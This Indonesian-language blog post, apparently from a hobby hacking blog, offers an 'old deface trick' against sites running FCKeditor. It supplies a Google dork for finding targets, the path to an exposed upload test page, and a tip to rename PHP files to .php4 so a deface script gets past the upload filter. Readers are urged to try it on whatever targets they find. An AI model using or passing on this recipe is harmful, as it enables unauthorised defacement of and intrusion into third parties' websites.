Trik Deface by AssoClateD 1.3.0 Shell Upload Vulnerability [trik lawas]

Trik Deface by AssoClateD 1.3.0 Shell Upload Vulnerability [trik lawas]



Rafi Orilya,-Sob.. kali ini ane bakal bagi trik deface lawas, yaa ngga tau sih masih aktif apa ngga.. saya nemu trik ini di document laptop saya. Hehe sebelum di hapus mending aku share ajah… hehe.. dicoba yah, barangkali masih bisa.

Dork => inurl:/includes/FCKeditor/

Exploit => /includes/FCKeditor/editor/filemanager/upload/test.html

Setelah masukin dork pada search engine goole, lalu pilih taget dan masukkin exploitnya :
http://www.target.com/patch/includes/FCKeditor/editor/filemanager/upload/test.html

Upload deh tuh script defacenya (html, php diganti php4)

Untuk mengecek/.membuka hasil deface : akan muncul setelah upload script selesai.

Hehehe… gimana-?
mudahkan semoga sukses dengan trik lawas ini yaa…
Semoga bermanfaat.

Artikel Dilindungi
Sertakan alamat blog ini jika mengcopy paste
Hak Cipta Dilindungi


Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin

2 komentar

  1. Wah, ternyata ini shell upload.. ane masih belum ngerti shell upload hehe

    BalasHapus

Komentar anda sangat dibutuhkan bagi kemajuan kami untuk terus berkarya.
Diharapkan :
* Berkomentarlah dengan bahasa yang baik
* Tidak ada unsur SARA, SPAM, PORNO
* Tidak merugikan orang lain
* Menunjukkan identitas yang jelas bukan Anonim

Diperkenankan :
* Komentar promosi link web anda
* Kritik & Saran

[Protected] by DMCA Protection Pro™
EmoticonEmoticon